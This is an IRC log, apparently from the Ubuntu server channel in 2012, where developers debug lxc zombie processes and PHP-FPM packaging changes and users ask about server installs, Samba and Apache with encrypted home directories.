<stgraber> can we get the errno in the log? that'd have helped quite a lot in this case :)
<hallyn> yeah, trivial to do
<hallyn> do you have any other changes to queue up?
<stgraber> I'll have the python-lxc fix for that new found bug
<stgraber> so just stack it in python:lxc, I'll fix my bug and upload after that
<hallyn> pushed
<hallyn> good night
<stgraber> good night
<hallyn> (trying to test one more time as i did a 'cleanup' and you know how those go)
<stgraber> hallyn: confirmed that it's indeed the zombie handler that's at fault. Will try to think about some ways around it and likely poke you about it tomorrow.
<stgraber> hallyn: I'm actually wondering if start() should do the dual-forking, set a reasonable process name (showing up as python3 kind of sucks) and let init deal with the whole zombie thing
<stgraber> because python3-lxc being a python extension it seems pretty tricky to only process the sigchld coming from the container and nothing else
<stgraber> and ultimately the container doesn't depend on the parent process (when the python shell goes away, the container keeps running)
<stgraber> so doing the full daemonizing with the usual dual-fork + exit might actually make sense (and then see if we can set the name to lxc-start or something similar that's more meaningful than python3)
<[snake]> Is it secure to put some files that you want to host on your web server in a file that's open(meaning it can be explored with the web browser because it doesn't have an index file)
<[snake]> ?
<koolhead17> hi all
<Kentos> Hello
<Kentos> anyone install ubuntu on a dell poweredge 2800 before?
<mysteriousdarren> Kentos: yes as well as 1800
<Kentos> im having some trouble with the install, i just bought it today, it already had a zentyal OS installed over Ubuntu, but im trying to get a fresh install and configuration for myself
<Kentos> basically boots right to zentyal
<mysteriousdarren> raid? specs please
<Kentos> I can get to the install from a Unetbootin USB, however it wants to check my cd-rom drive quickly after install begins
<Kentos> 2800, raid 5 on 4 drives, OS is currently on a seperate drive, total of 7 drives 4x 74gb 2x 36gb and one 9.1gb drive, I've not got a whole lot of info to be honest
<mysteriousdarren> well did you have it check the disc for errors?
<Kentos> the OS is on a 36gb drive, i believe the 4x 74gb are on a newer scsi raid adapter
<Kentos> ill run that quick ya, I wasnt quite sure where to go, ive only played with the server OS a handful of times before
<Kentos> going to take a second to boot up and into the USB
<uvirtbot> New bug: #1015033 in mysql-5.5 "mysqlhotcopy errors on databases containing MyISAM views" [High,In progress] https://launchpad.net/bugs/1015033
<mysteriousdarren> ok, what were you gonna install? a base? or everything?
<Kentos> im looking to get the server on it, I don't want to mess around with whats already set up for an OS. not heard of the term base before
<Kentos> just want to install ubuntu server on it, and go throught the configuration, i printed off the ubuntu server manual and have a lot of coffee
<Kentos> alright into the usb and checking disc for errors
<mysteriousdarren> it shouldn't take too long
<Kentos> went to auto boot lol, i dont have batteries for my keyboard on this comp, so i do quick switching from usb ports lol
<Kentos> ahhh i thought that might be it
<Kentos> md5sum is not right, ive tried downloading it multiple times now
<Kentos> tried the torrent, the odd thing is i always get the same hash, but its always the wrong one
<mysteriousdarren> well that sucks, try direct this time
<Kentos> oh i have twice lol
<mysteriousdarren> different locations?
<Kentos> its very odd, maybe a problem with chrome downloader
<Kentos> not sure how to navigate that file tree
<mysteriousdarren> download via ubuntu?
<Kentos> ill try it again, im DLing the 1386 version as the proccesor i believe is the 32 bit one for the 2800s
<Kentos> i386**
<Kentos> 645 MB, does that sound a bit low?
<mysteriousdarren> how much ram do u have? the 1800 was 64 bit
<Kentos> hmmm, i have 3gb roughyl on this one
<Kentos> you may be right that it can run it, but its an older version i believe that wouldnt support the dual core Xeons
<Kentos> im thinking its a v2 mobo
<mysteriousdarren> 645 is right
<mysteriousdarren> ya after some checking your correct on not supporting it
<Kentos> i keep getting hash check fails
<Kentos> even on the 64 bit iso i DLed
<Kentos> I may have to try a different browser
<Kentos> the new DL of the iso is about done, ill check it quick
<Kentos> yeah same hash as all the others
<mysteriousdarren> seems weird
<Kentos> its kinda wierd, im wondering if something is off here with my system, since its not downloading it right from anywhere
<mysteriousdarren> http://releases.ubuntu.com/12.04/
<Kentos> yeah, this may take a minute
<Kentos> what I'm aiming to do with the server is to host websites, or possibly do some data storage for friends etc via a webpage if i can get that set up
<Kentos> mostly low traffick type of stuff
<Kentos> maybe even host some older games or something, I just want to see where i can go with it
<Kentos> seems like i might be able to get a deal on better processors provided the mobo can handle them, or atleast a second processor if all things go well
<Kentos> is there any drivers or anything i will have to get from dell?
<Kentos> I couldn't find a whole lot but might as well look again if ill need somethign
<mysteriousdarren> I never looked about drivers
<mysteriousdarren> if your serious about games, i'd just rent and save the hassle
<Kentos> yeah, i dont believe so, but i was prompted for drvier media on the bad boot usb, so it might not be a real issue
<Kentos> nah, im serious about getting a useful hobby
<Kentos> learning something I dont already know
<Kentos> and if i do the data storage or website hosting it'll be for friends and family etc.  do something for myself and offer what i can for my fam and friends
<mysteriousdarren> I might pass out, be warned sorry
<Kentos> no worries, thanks for the help so far. Im pretty sure its just a bad download issue for the iso file
<jimmy> I am converting windows server (attached to 6 windows clients) to two ubuntu servers. one is to be a router (dhcp, dns, firewall) for increased security. second is to be samba, apache, sql, raid. am I on right track? where can I find info? - have spent 2 months googling w/ no results.
<Kentos> I think samba is the file server type that you want for windows clients to access it, but im just starting to get my server going...not even off the ground yet so to speak
<mysteriousdarren> yes that is correct
<Kentos> but i believe the samba file serveri s the kind that is best for multiple types of OS's not sure why though
<Kentos> maybe the drive formatting?
<mysteriousdarren> samba just allows linux to talk to windows
<Kentos> port protocols for the networking right?
<Kentos> i noticed windows using the samba ports for IGMP before, was curious about that
<mysteriousdarren> how is the dl going?
<Kentos> just finished and checking the hash
<Kentos> no go
<Kentos> very strange, not sure why this is happening
<mysteriousdarren> have a friend dl it for you
<Kentos> good thing to try i suspect
<jimmy> does samba have to handle dhcp duties for windows clients?
<Kentos> hmm, DLing an alternate at 692 MB file size, hopefully this is the right one, at lest something is different =P
<Kentos> couldn't say myself jimmy, maybe in a few months ill have the experience to help =/
<jimmy> thx and have a great night/day!
<mysteriousdarren> samba is a protocol for file sharing
<mysteriousdarren> jimmy: http://en.wikipedia.org/wiki/Samba_(software)
<Kentos> still can't get a real DL of the Iso lol. maybe i have to put it off for a few days
<koolhead17> Daviey: ping
<Kentos> anyone up? Trying to get this install going on a dell poweredge 2800
<RoyK> Kentos: 'sup?
<Kingsy> does anyone know how you get a ar report from date to date? I know you can get a full 24 hours with sar -f /var/log/sa/sa29 -A  for example.. but what if you wanted 29 - 04 or whatever
<Kingsy> I know -e and -s manages times, but I havnt seen how to get a report spanning across more than 24 houts
<Kingsy> hours*
<Kentos> trying to get this server installed with a new ubuntu OS
<Kentos> its seems it just won't go
<Kentos> I'd appreciate some help if anyone can. I thought it might be the hash check error but i found some posts stating the hash checks on the ubuntu page were not the right ones. So it would seem things should boot, but they don't
<koolhead17> zul: let me know when your here sir.
<koolhead17> it appears that 2 files are missing from the quantum config :P
<giroo> hi all
<giroo> is it safe to backport lxc from quantal to precise or should I expect some problems doing that?
<giroo> stgraber: you seem very active in lxc, maybe you have some insight into this?
<Kentos> i wish i could figure out what Im not doing to get this thing to boot properly
<Kentos> got me stumped
<Kentos> but I guess ill try again tomarow, later all
<Daviey> koolhead17: hey
<koolhead17> Daviey: howdy sir :)
<jamespage> Daviey: how would you feel if I did a general call for testing of quantal on the ubuntu-server mailing list? not really tied to the beta but stating we are in the final run now so bug fixing is important - go find bugs!
<Daviey> jamespage: Always a good idea
<Daviey> :)
<jamespage> ack
<koolhead17> zul zul zul zul
<zul> koolhead17: should be fixed in today's upload
<koolhead17> zul: awesome. both the issues vncproxy and quantum one
<koolhead17> :P
<zul> koolhead17: yep
<koolhead17> cool
<stgraber> giroo: quantal to precise is fine. I have these backports in ppa:stgraber/experimental and they'll be pushed to precise-backports once we're done pushing a bunch of changes to quantal
<giroo> stgraber: cool, thanks
<giroo> stgraber: can we expect one of your great lxc blog posts about what's all new in this cycle?
<stgraber> giroo: yep, I'm at least going to blog about the new API, then do one of these generic "what's new" blog post close to release time
<giroo> stgraber: awesome :)
<giroo> please keep up the great work
<zul> soren: ping
<hallyn> stgraber: now i can't recall...  aren't there some apparmor issues still in precise which could cause trouble with quantal to precise lxc backport?
<hallyn> or were all of those fixed in precise?
<stgraber> hallyn: I think they were all fixed, at least nobody running my backports complained yet ;)
<hallyn> stgraber: cool
<stgraber> hallyn: did you see what I wrote yesterday about having start() do a dual-fork + exit to move the container as a child of init?
<hallyn> nope
<hallyn> so it is init and not python reaping?
<hallyn> stgraber: yeah...  do you happen to know if daemonize() actually does that?  i didn't think it did...
<hallyn> no, daemon(0,0) only clones once
<stgraber> hallyn: right, the idea is that if we make the container a child of init, I don't have to deal with the whole zombie situation in my code and it'd also make it consistent with what lxc-start -d does
<hallyn> stgraber: oh wait,  I think the problem is I'm no longer doing setsid()
<hallyn> no, i am
<hallyn> stgraber: I'm doing setsid, so you shouldn't have to!
<hallyn> stgraber: do you have any reference for 'dual fork'?  I don't see anyone doing that
<stgraber> root     16551  0.0  0.0  25236  2264 pts/8    S    10:14   0:00  |       \_ /bin/bash
<stgraber> root     16907  0.1  0.0  60012  8788 pts/8    S+   10:18   0:00  |           \_ python3
<stgraber> root     16909  0.0  0.0      0     0 ?        Zs   10:19   0:00  |               \_ [python3] <defunct>
<stgraber> hallyn: ^ that's what I'm trying to avoid. This being the result of start() + stop()
<hallyn> stgraber: right, i understand.  but setsid is supposed to do that
<hallyn> well, i guess i can try dual fork.  it makes sense, i just don't see anyone doing it.
<hallyn> lemme spin off a branch...
<Daviey> hallyn: I have encountered dual forks before.. they ended up intermingling.. rather confusing.. i documented it here.. http://dual.forks.daviey.com/
<stgraber> hallyn: I can't find any proper reference to it, though it's essentially what lxc-start does with -d at the moment as lxc-start itself exits after spawning the container in the background
<hallyn> stgraber: oh, well - it doesn't dual-fork, it just exits after the first fork.
<hallyn> in fact, i think i see now
<hallyn> we used to exit, now we wait for completion
<hallyn> so that (recent) change probably broke this.  ok, tree almost ready for testing
<plod> Hi I am trying to create a vm with ubuntu-vm-builder and I am getting a 2012-09-07 15:24:31,485 ERROR   : Process (['umount', '/tmp/tmpbBTW0f/dev']) returned 1. stdout: , stderr: umount: /tmp/tmpbBTW0f/dev: device is busy.
<plod>         (In some cases useful info about processes that use
<plod>          the device is found by lsof(8) or fuser(1))
<hallyn> Daviey: btw, thanks :)
<karihre> Question, I have now blocked all ports except for tcp/udp 2049 and I don't see any program listening to this port (using lsof -i), yet nfs v4 works.  Can someone explain to me what I'm missing?
<hallyn> stgraber: well i pushed to bzr+ssh://bazaar.launchpad.net/~serge-hallyn/ubuntu/quantal/lxc/lxc-dualfork/, doesn't seem to help.
<hallyn> I'm still pretty sure the setsid() is supposed to do that for us anyway
<hallyn> so why isn't it...
<hallyn> wtf let's check ppid before and after.
 * koolhead17 is happy
<Daviey> hallyn: hope it helps.
<hallyn> let's try using setpgid(0,0) i place of setsid
<stgraber> hallyn: I pushed the code change to python-lxc removing the reaper code to my git branch
<hallyn> stgraber: actually can you try the lxc-dualfork branch?  Maybe I'm now failing for different reasons.
<stgraber> with that change, start() will work with hooks but you'll see the zombie processes if you stop a container (at least until you figure out why that's happening)
<stgraber> hallyn: yep, I can do that
<hallyn> no this doesn't make sense.  sometimes ppid  is 1, sometimes not (after dual fork)
<hallyn> must be racing with myself
<hallyn> yeah i think it's now actually working and my containers fail for a different reason
<hallyn> i STILL say setsid should keep your reaper from reaping the child, but...
<stgraber> hallyn: hmm, so using the dual-fork branch and after removing my reaper, I see that the container is now a child of PID 1 but I'm still getting a defunct child
<hallyn> stgraber: can you run that through strace ?
<stgraber> hallyn: http://paste.ubuntu.com/1190977/
<stgraber> well, I guess it makes sense that the initial fork is still the child of the python shell... so I still need to reap that one...
<stgraber> or can we do that in liblxc?
<stgraber> as I'm not the one calling fork() it's a bit difficult to do the waitpid()
<hallyn> oh, yeah, i guess we can
<hallyn> so that is the firs fork that'z zombieing?
<stgraber> looks like it
<hallyn> yeah lemme reap that, one min
<raub> LSBInitScripts question: Required-Start means if facility is not running (even if it is not installed), service depending on it will not start?
<stgraber> raub: I believe that's correct. Though please note that Ubuntu doesn't use the LSB headers
<raub> stgraber: what does it use then?
<hallyn> stgraber: re-pushed to bzr+ssh://bazaar.launchpad.net/~serge-hallyn/ubuntu/quantal/lxc/lxc-dualfork/ .  stab in the dark, but shoudl work
<raub> AFAIK, it does not use inserv, which is fine with me
<stgraber> raub: upstart uses the init jobs in /etc/init/ with their start/stop conditions instead. For sysvinit scripts in /etc/init.d, they just start sequentially depending on the runlevel (/etc/rcX.d/)
<raub> But the packages in question -- nslcd/nscd -- do not seem to be upstart-ready yet
<stgraber> hallyn: ok, testing
<hallyn> what fun.  "start on runlevel [2345]\nexec reboot\n"
<stgraber> hallyn: looks like you killed all the zombies! :)
<hallyn> yay.  and containers start?
<raub> stgraber: a bit of a bummer on the LSB headers though
<stgraber> hallyn: yep
<stgraber> hallyn: only bit of code to port from shell to python is the fstab handling, everything else seems to be working great
<hallyn> stgraber: cool.  you're going to grab the doublefork patch whenever you push?
<hallyn> I assume there's a git pull request coming my way too, so so as not to complciate things in your tree I"ll wait for that
<stgraber> hallyn: I'm still not sure whether I want to push the python rewrite in quantal, but I'll at least send you a pull request for it
<stgraber> hallyn: did you push the doublefork change to your git? that one I dion't have in mine
<hallyn> no i didn't
<hallyn> stgraber: do you want me to, or are you doing it?
<stgraber> hallyn: go ahead
<smoser> rbasak, so... i'm pretty sure that i'm just SOL right now
<smoser> with our ephemeral images.
<hallyn> k
<smoser> i'm not sure what would have broke them (they previously worked), but now this issue with mounted / coming before virtual-filesystems (and udev) is just really screwing me.
<Jake232> Is there an easy way to overwrite a function within a class, with a new function? I can't just curry it with a new function because there are references to this in other libraries I don't want to edit. eg, I want to do something like
<Jake232> requests.get = functools.partial(requests.get, timeout=0.00001)
<Jake232> wrong channel, my bad
<zul> Daviey: uploading a new snapshot this afternoon
<jamespage> utlemming, I'm guessing you probably won't be fixing bug 928990 for quantal?
<uvirtbot> Launchpad bug 928990 in cloud-init "fsck / dirty filesystem on instance is death" [High,Triaged] https://launchpad.net/bugs/928990
<utlemming> jamespage: I'll be building a rescue image for that, but no, we're not going to fix that in instance.
<utlemming> jamespage: that is in the cloud image roundtable blueprint. We talked about options and thought it best to just a rescue volume
<jamespage> utlemming, is that a 'Won't Fix' then? or should we leave it open for the future?
<utlemming> yeah, I'll put something in the bug there
<tonyyarusso> I currently have Postfix set up with both Amavis and SpamAssassin on 12.04, based on the Server Guide.  I want to use user preferences with SpamAssassin, which apparently the version of Amavis in the repos for precise doesn't support.  How would I go about removing Amavis from the mix and just having Postfix call SpamAssassin directly?
<TheLordOfTime> is the server team aware that PHP 5.4.4 and greater (which would include the 5.4.6 in Ubuntu) listens by default on a UNIX socket instead of a TCP listener?
<TheLordOfTime> and that it may impact other applications/packages which use PHP's configurations?
<protoCall7> Hi all, can anyone explain if this log entry is normal behavior or if it is indicating a problem? Sep  7 08:02:33 rarch-002 sshd[5335]: Connection closed by 10.30.0.123 [preauth]
<Daviey> zul: cool
<Jeeves_> TheLordOfTime: Why would php listen on a socket?
<Jeeves_> Unless you tell it to do so?
<TheLordOfTime> you don't read the changelogs much, i guess, because in 5.4.4 it was patched to automatically have that as a default config option
<TheLordOfTime> was wishlisted in both Ubuntu and Debian, was fixed in both.
<TheLordOfTime> s/fixed/implemented/
<TheLordOfTime> i wrote the patch, i'd know.
<TheLordOfTime> having said this, if the server team thinks that should change, they only need to remove a single patch from the package.
<Jeeves_> No, I don't read changelogs much. I've got about 590 packges on an average server. I've got more to do than reading those changelogs :)
<TheLordOfTime> :P
<hallyn> SpamapS: ^ i assume you were aware of the php listening on unix sock default change?
<TheLordOfTime> well, that changed the default configs, though, so webserver documentations might need updating
<SpamapS> hallyn: very aware
<TheLordOfTime> https://bugs.launchpad.net/ubuntu/+source/php5/+bug/900620
<uvirtbot> Launchpad bug 900620 in php5 "Possible Bug: php5-fpm does not listen on a socket by default" [Wishlist,Fix released]
<TheLordOfTime> SpamapS was integral in helping get that patch to Debian
<hallyn> SpamapS: jolly good
<SpamapS> TheLordOfTime: are you talking about php-fpm ?
<TheLordOfTime> SpamapS:  aye
<TheLordOfTime> SpamapS:  specifically -fpm
<SpamapS> TheLordOfTime: right so upstream followed suit then?
<TheLordOfTime> SpamapS:  not sure if upstream did, i know at least Ubuntu users are getting that patch implemented
<TheLordOfTime> SpamapS:  i'd have to dig around in upstream
<TheLordOfTime> atm, i'm fighting PHP 5.4.6 on this system right now, so...
<SpamapS> TheLordOfTime: I had read somewhere that some high-intensity tests revealed that it was actually slower because of some kernel locks around unix sockets that had been optimized away in AF_INET
 * TheLordOfTime kicks the PHP source code.
<TheLordOfTime> SpamapS:  then should the patch be removed?
 * SpamapS will probably never be able to find that article again tho
<SpamapS> TheLordOfTime: no, AF_UNIX should be fixed :)
<TheLordOfTime> :P
<TheLordOfTime> SpamapS:  the only reason i remembered the change is because someone in #nginx was running PRecise server and was using QUantal level PHP
<TheLordOfTime> (5.4.6 at least)
<TheLordOfTime> they were complaining about the upgrade breaking their setups
<TheLordOfTime> and i remembered that patch/change, so...
<TheLordOfTime> i'm itrying to track down changelogs now, SpamapS, for upstream source, see if they implemented it or not there.
<SpamapS> TheLordOfTime: the upgrade shouldn't break anything.. we did that as the default in 11.10 IIRC
<TheLordOfTime> SpamapS:  it was implemented in 5.4.4 of PHP, 11.10 had an older version
<TheLordOfTime> 5.4.4 wasnt synced to Precise before freeze
<TheLordOfTime> so the changes made it to Quantal
<TheLordOfTime> not Precise
<TheLordOfTime> so 11.10, 12.04 are both still using the  original default listener, 127.0.0.1:9000
<TheLordOfTime> SpamapS:  and the implementation was only in Debian and Ubuntu
<TheLordOfTime> (Upstream didn't adopt the change)
<SpamapS> right
<SpamapS> ok so this might warrant a NEWS item
<TheLordOfTime> mhm
<TheLordOfTime> i'm going to put a note in my blog, that'll aggregate on planet.u.c, so...
<SpamapS> I recall now that there was no need for a NEWS entry for Debian because they had not shipped php5-fpm in squeeze
<SpamapS> TheLordOfTime: how about opening a bug and making a patch to debian/NEWS?
<SpamapS> and perhaps release notes too
<TheLordOfTime> SpamapS:  can i post on my blog first?  I've been working on the post for 10 minutes, and am on a roll.
<SpamapS> quantal is a good time to make these changes.. but we need to call them out
<TheLordOfTime> i'll make the bug shortly afterwards, the patch is only in Quantal we're targetting?
<TheLordOfTime> s/patch/news change and release notes change/
<SpamapS> TheLordOfTime: I'd recommend linking to the bug in the blog post (perhaps as an update after the fact)
<TheLordOfTime> that's what i plan on doing :P
<SpamapS> TheLordOfTime: thanks for helping out with PHP. :)
<TheLordOfTime> yep
<TheLordOfTime> SpamapS:  still waiting on that SRU to go through, but...
<TheLordOfTime> :P
<TheLordOfTime> i'm not whining, i've got the patched version already running via a PPA, so....
<SpamapS> TheLordOfTime: SRU team has been busy w/ 12.04.1 and then beta1 .. only a couple items in front of it now.
<TheLordOfTime> indeed.
<TheLordOfTime> as i said, i'm not complaining, i'm running a patched version already :p
<TheLordOfTime> SpamapS:  https://bugs.launchpad.net/ubuntu/+source/php5/+bug/1047520
<uvirtbot> Launchpad bug 1047520 in php5 "NEWS and release notes need updating" [Undecided,New]
<TheLordOfTime> probably forgot to set a status other than "New" though...
<TheLordOfTime> *shrugs*
<TheLordOfTime> there we go, "In Progress"
<SpamapS> TheLordOfTime: targetted at Quantal
<SpamapS> TheLordOfTime: Once you have the text figured out, we can add it to the bug description and open a task against ubuntu-release-notes
<TheLordOfTime> SpamapS:  alrighty, i assume that I don't need to include a debdiff detailing the changes, but rather I should just figure out the wording and post that?
<SpamapS> TheLordOfTime: a debdiff or merge proposal against lp:ubuntu/php5 would be a lot easier to sponsor in :)
<TheLordOfTime> true.
<TheLordOfTime> that's dependent on whether this system explodes or not...
<TheLordOfTime> its been close to dying a lot lately
<TheLordOfTime> SpamapS:  oh, a bug needs to be filed against phpmyadmin, if not already filed against it, which changes its fpm configuration options (was reading through the Debian bug on that initial Wishlist bug that changed things)
<TheLordOfTime> ... oh snap, i'm going to be late for class...
<SpamapS> TheLordOfTime: thanks for the tip, go go go
<TheLordOfTime> SpamapS:  before i run, where in debian/NEWS should i put the note about the changes, in the 5.4.4 section(s), or in a new entry?
<stgraber> hallyn: sent a pull request your way
<stgraber> hallyn: this includes the new lxc-start-ephemeral
<hallyn> stgraber: nifty
<hallyn> btw i tried to do a git-send-email from my mail server, but lxc-devel didn't like that address.
<hallyn> I'm not about to send 100 patches by hand to the m-l, so we'll just have to hope Daniel is ok with the github workflow
<TheLordOfTime> SpamapS:  oh hang on...
<TheLordOfTime> SpamapS:  already in NEWS: http://paste.ubuntu.com/1191228/
 * TheLordOfTime runs at insane speed to class
<stgraber> hallyn: I think he'll be, otherwise I'll figure out a way to get the 100 commits to the ML, but I'm not sure everyone will like that :)
<stgraber> hallyn: any thoughts on registering an lxc "project" on github so we can have a shared staging branch on there? That way whenever one of us has something to push, we can just send a pull-request to that branch and the other can review
<stgraber> FWIW Daniel seemed happy to have an official staging branch that he can easily pull from and I believe having it on github would make it much more accessible to other contributors
<hallyn> stgraber: i'd be happy with that
<stgraber> ok. I'll try to figure out how to do that then
<hallyn> stgraber: one issue with lxc-start-ephemeral,
<hallyn> you're hardcoding some paths
<hallyn> which other scripts set through '@LXCDIR@' etc,
<hallyn> i.e. lxc-start-ephemeral should probably be lxc-start-ephemeral.in ?
<hallyn> (i've already merged your request)
<stgraber> hallyn: oh yeah, that'd make sense
<stgraber> hallyn: did you see anything besides /var/lib/lxc?
<hallyn> hm, i'm really not sure about the ordering after commits after a pull request.  i may have to install gitk to get a closer look
<hallyn> checking
<hallyn> stgraber: no only htat one
<stgraber> ok, I'll reduce the use of it even more, then turn the script into a .in for the remaining one
<hallyn> stgraber: cool, thanks.  shout when a new pull requeset is ready
<hallyn> (my laptops are all busy trying to reproduce odd bugs)
<stgraber> hallyn: hmm, do we actually have a variable for /var/lib/lxc? LXCDIR is only defined in lxccontainer.h
<hallyn> stgraber: stgraber I think '@LOCALSTATEDIR'/lib/lxc - at least that seems to be hardcoded in some places
<hallyn> LXCPATH
<hallyn> (@LXCPATH@)  pretty sure that's it
<hallyn> hm, my laptop has precise-backports enabled.  i didn't think i'd enabled those
<TheLordOfTime> hallyn:  that's been on by default i think
<TheLordOfTime> for a while...
<stgraber> hallyn: it's enabled by default but packages won't auto-install/auto-update from it. You need to specifically pull a version from it
<hallyn> ah, ok
<hallyn> was hoping that might explain why apt insists that 'tk', which is in main, cannot be authenticated
<stgraber> -dest_path = tempfile.mkdtemp(prefix="%s-" % args.orig, dir="@LXCPATH@")
<stgraber> +dest_path = tempfile.mkdtemp(prefix="%s-" % args.orig, dir="${localstatedir}/lib/lxc")
<stgraber> hallyn: ^ do you know how to tell autoconf to fully expand these?
<hallyn> stgraber: just the '@LXCPATH@' should do it... not working?
<stgraber> hallyn: looks like in the shell scripts we have an extra localstatedir=@LOCALSTATEDIR@ line to workaround that problem, but that's not of much help with python
<stgraber> hallyn: @LXCPATH@ is expanded to "${localstatedir}/lib/lxc" not "/var/lib/lxc"
<hallyn> ah
<hallyn> stgraber: those get expanded in Makefile.am, maybe the thing to do is make a new define which does the right thing for python
<stgraber> hallyn: Makefile.am seems to expand them before setting them in the cflags, though I'm not sure how that'd help for python... I guess I can simply add an extra target that does a sed though...
<hallyn> stgraber: sorry - actually look at configure.ac
<hallyn> jsut add a python_lxcpath variable in there, and use proper python in the text in that one
<hallyn> oh, yeah.  sed would work too i guess
<adam_g> Daviey: when you have a second.... what is th best way to get bug #1044318 moving? i assume its too late to upload a new version into quantal (assuming the fix is debian, to begin with). should i apply the fix to quantal package as a patch to get it fix released there, and start the SRU process for the precise package?
<uvirtbot> Launchpad bug 1044318 in quantum "pre-1.5 OVS has trouble with floating ips when pinging from the same box" [High,Confirmed] https://launchpad.net/bugs/1044318
<Daviey> adam_g: well, it needs to be fixed in Quantal to start with, regardless
<Daviey> adam_g: diff looks SRU-able IMO.
<Daviey> as a patch
<adam_g> Daviey: yeah, no problem on the SRU. im wondering how to get it fix released in quantal. if the fix is included in debian, is it to late for another merge? or should it just be carried as a patch in Q?
<joemyfriend> Is it ok to encrypt your home directory if Ubuntu server is going to be an apache server?
<Daviey> adam_g: it's not too late for another merge, no
<joemyfriend> I wanted to have docroot in that users home dir
<Daviey> adam_g: if the merge introduces features, it should be signed off first tho
<Daviey> but bug fix merge is fine
<adam_g> Daviey: okay, ill see whats what in debian
<joemyfriend> Anyone good with Apache?
<joemyfriend> I'm in need of some help. =(
<RoyK> !ask
<ubottu> Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience
<RoyK> well
<RoyK> an encrypted home won't work well with apache serving it
<RoyK> you will need a freetext storage area for web
<RoyK> just reconfigure apache to use another place to store home websites
<joemyfriend> Why won't it work?
<RoyK> serving from encrypted homes won't work well, period
<RoyK> because the user needs to be logged in for the storage to be available
<RoyK> which is really the reason for encrypting things
<joemyfriend> If the user is user1 and the application runs as root?
<joemyfriend> I didnt code this application and I know it shouldnt run as root but that is how it is now (atleast in testing)
<RoyK> root can't decrypt a user's encrypted home
<joemyfriend> But it seems to be working
<RoyK> log out
<RoyK> and it won't
<joemyfriend> ?
<joemyfriend> This is on Ubuntu server
<RoyK> yes
<joemyfriend> I"m sudoing from the user to run this application as root
<RoyK> reboot the machine and sudo into the user with an encrypted home, and you won't find shit
<RoyK> that's what encrypted home is about
<RoyK> it's safe with the user
<RoyK> not root
<RoyK> so use another place for storing things exposed to the net
<joemyfriend> Ok so I may have to create a new user and then move the docroot
<joemyfriend> Don't know why it is working
<arrrghhh> or just put the docroot in like /var/www
<arrrghhh> not in the encrypted /home
<adam_g> Daviey: so, debian is not any more recent than we are (1.4.2+git20120612-9), dan just mentioned a new stable upstream release (1.4.3) came out last night. is it acceptable to update to that in Q, ahead of debian?
<joemyfriend> Should that user own those directories
<joemyfriend> 755?
<RoyK> joemyfriend: docroot is irrelevant, home directories can be set somewhere else
<joemyfriend> Sorry, I'm only worried about apache. I understand
<RoyK> joemyfriend: and it doesn't matter what permissions you set if the home directory is encrypted
<arrrghhh> indeed joemyfriend.  i would put docroot somewhere else other than /home if you use encrypted /home's
<joemyfriend> Web apps shouldn't run as root rigth?
<arrrghhh> www-data usually
<joemyfriend> This dev is annoying me
<RoyK> joemyfriend:         <Directory /home/*/public_html>
<RoyK> that's the default
<RoyK> in userdir.conf
<RoyK> choose another directory for that
<RoyK> web apps run as www-user
<RoyK> by default
<RoyK> running web apps as root isn't very smart
<joemyfriend> Agreed.  developer is insisting that is ONLY way to go
<joemyfriend> Another ?
<RoyK> www-data, not -user, sorry
<RoyK> joemyfriend: can you spell RTFM?
<joemyfriend> ?
<arrrghhh> oh noes
<joemyfriend> read the f***** manual
<joemyfriend> Does an alias directory have to exist or is it like a link (think ln)?  so can I alias for /var to /home/username/webdata when there is no /var?
<joemyfriend> Sorry I haven't been working with apache in years (10 to be exact)
<joemyfriend> Can I alias for a directory that doesn't exist?  FYI I'm restoring this application from an older box with a different configuration
<stgraber> hallyn: sent updated pull request: https://github.com/hallyn/lxc/pull/5
<roaksoax> smoser: failed to get https://maas.ubuntu.com/images/query/quantal/ephemeral/released-dl.current.txt
<roaksoax> remote query of https://maas.ubuntu.com/images failed
<smoser> utlemming, ^
<smoser> do you know anything about that
<Daviey> adam_g: I'd be happier if quantal shipped a release rather than a snapshot. :)
<adam_g> Daviey: meaning what? jump the gun with a new orig.tar.gz? the snapshot comes from debian.
<utlemming> smoser: I have touched nectarine's MAAS code/generation/process yet
<Daviey> adam_g: take note that the DM is well integrated into upstream, i'd expect a new Debian version shortly
<Daviey> adam_g: I'd be tempted to shoot an email to the DM asking if he has plans
<utlemming> smoser: but I don't see any quantal images being built there
<joemyfriend> RoyK, Thanks 4 ur help
<smoser> ah. you're right. roaksoax we have not built any quantal
<smoser> utlemming, sorry. i was afraid fallout of move off nectarine
<roaksoax> smoser: ah! that is it then
<utlemming> smoser, roaksoax: I hope to have some EOD, but no promises there
<utlemming> smoser: I wanted to make sure I understand the process before I move that off...and I will absolutely get your sign off before I migrate the MAAS generation
<adam_g> Daviey: i think we're on our own for the new stable release. #openstack-dev, if interested.
<hallyn> stgraber: still using /var/lib/lxc?
<hallyn> (s'ok, it can get straightened out later)
<stgraber> hallyn: hmm, the last commit should be fixing that...
<stgraber> hallyn: or not... looks like I messed up my commit
<stgraber> canceling the pull request, will fix
<stgraber> too late actually ;) you already merged it
<Daviey> hallyn: gah, dammit.
<Daviey> err, adam_g
<Daviey> adam_g: Okay, just cherry the patch to Quantal for now, to unblock the SRU
<Daviey> we'll evaluate the stable solo effort next week
<hallyn> stgraber: i pulled, but didn't hten push
<hallyn> Daviey: i should ignore?
<Daviey> hallyn: Yes, wrong nick.. sorry
<hallyn> stgraber: oh no, i did
<stgraber> hallyn: there you go: https://github.com/hallyn/lxc/pull/6
<hallyn> stgraber: yup got it, thanks
<hallyn> stgraber: it's all very unfortunate :)  we should probably look for a better way
<stgraber> hallyn: https://github.com/lxc/lxc/commits/github/staging
<stgraber> hallyn: that's the new staging tree
<stgraber> hallyn: these last two "merge" commits seem to be messing quite a bit with the history... will see if I can fix that somehow
<hallyn> stgraber: cool.  teams :)
<hallyn> thanks
<stgraber> hallyn: oh, fun, our branch doesn't actually apply on the upstream git ;)
<hallyn> how can that be?
<stgraber> apparently some of the apparmor stuff merged upstream doesn't match what we have in the branch
<stgraber> I'm attempting a rebase now to try and sort out that mess
<hallyn> stgraber: that's true, but the apparmor stuff in upstream git should be what's in my lxcgit
<stgraber> hallyn: it's close but not quite
<hallyn> could thing i haven't yet further complciated it with selinux implementation
<hallyn> and smack
<stgraber> hehe
<adam_g> zul: thoughts on making OVS the default quantum plugin ?
<adam_g> Daviey: ^
<ScottK> Isn't it rather late in the game?
